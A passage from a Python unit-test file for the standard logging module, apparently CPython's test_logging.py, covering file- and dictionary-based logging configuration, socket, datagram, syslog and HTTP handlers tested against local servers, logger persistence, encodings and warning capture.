format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
